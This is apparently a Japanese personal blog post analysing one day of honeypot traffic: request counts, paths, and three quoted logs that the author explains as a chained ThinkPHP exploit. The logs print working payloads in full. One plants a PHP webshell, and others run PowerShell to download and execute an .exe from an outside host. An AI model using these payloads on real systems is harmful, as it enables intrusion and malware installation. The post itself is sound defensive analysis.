honeypotの簡易解析12日目

結局昨日も前に書いたメール飛ばすscriptのメンテナンスに時間をとられてしまっていたorz

今日は無事に稼働していたので、もう大丈夫になったと信じたい・・

■2019-04-12のアクセス数は84件でした。

■送信元IPアドレスの数は 63件です。

■メソッドの一覧と件数は以下です。

method総数 – method
CONNECT1
GET82
POST1
合計 結果84

■アクセスパス一覧と件数は以下です。

pathmethod総数
/ GET61
//vtigercrm/vtigerservice.phpGET2
/ccvvGET1
/MainGET1
/myadmin/scripts/setup.phpGET2
/mysql/scripts/setup.phpGET1
/mysqlmanager/scripts/setup.phpGET1
/phpmyadmin/GET2
/phpMyAdmin/scripts/setup.phpGET1
/phpmyadmin/scripts/setup.php/index.phpGET1
/pma/scripts/setup.phpGET1
/public/hydra.php?xcmd=cmd.exe%20/c%20
powershell%20(new-object%20System.Net.WebClient)
.DownloadFile
(‘http://fid.hognoob.se/download.exe’,’
C:/Windows/temp/ubhflqgunjzgqat2803.exe’);
start%20C:/Windows/temp/ubhflqgunjzgqat2803.exe
GET1
/public/index.php?s=/index/\think\app/invokefunction
&function=call_user_func_array&vars[0]=system&vars[1][]=
echo%20^<?php%20$action%20=%20$_GET[‘xcmd’]
GET1
/public/index.php?s=index/think\app/invokefunction&
function=call_user_func_array&vars[0]=system
&vars[1][]=cmd.exe%20/c%20powershell%20
(new-object%20System.Net.WebClient).
DownloadFile(‘http://fid.hognoob.se/download.exe’,
‘C:/Windows/temp/ubhflqgunjzgqat2803.exe’);start%20
C:/Windows/temp/ubhflqgunjzgqat2803.exe
GET1
/scripts/setup.phpGET1
/tmUnblock.cgiPOST1
/w00tw00t.at.blackhats.romanian.anti-sec:)GET2
www.google.com:443CONNECT1
(空白)GET2

気になるlog

-=-=54〜56件目のlog=-=-

#1つめ
[2019-04-12 14:15:02+0900] 
GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ubhflqgunjzgqat2803.exe');start%20C:/Windows/temp/ubhflqgunjzgqat2803.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://ほげ:80/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: ほげ

#2つめ
[2019-04-12 14:15:02+0900]
GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://ほげ/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: ほげ

#3つめ
[2019-04-12 14:15:02+0900]
GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ubhflqgunjzgqat2803.exe');start%20C:/Windows/temp/ubhflqgunjzgqat2803.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://ほげ:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ubhflqgunjzgqat2803.exe');start C:/Windows/temp/ubhflqgunjzgqat2803.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: ほげ

これらはthinkPHPの脆弱性をつく攻撃。よくセットでくるなぁと思っていたら、これらは相関関係があった。

1ひとつめの通信は脆弱性からcmdからpowershellを起動させマルウェアをダウンロード&実行している。

2つめの通信は脆弱性からhydra.phpを設置し、cmdを実行するwebshellを設置している

3つめの通信は単純に設置したhydra.phpをついてcmdからpowershellを起動させマルウェアをダウンロード&実行している。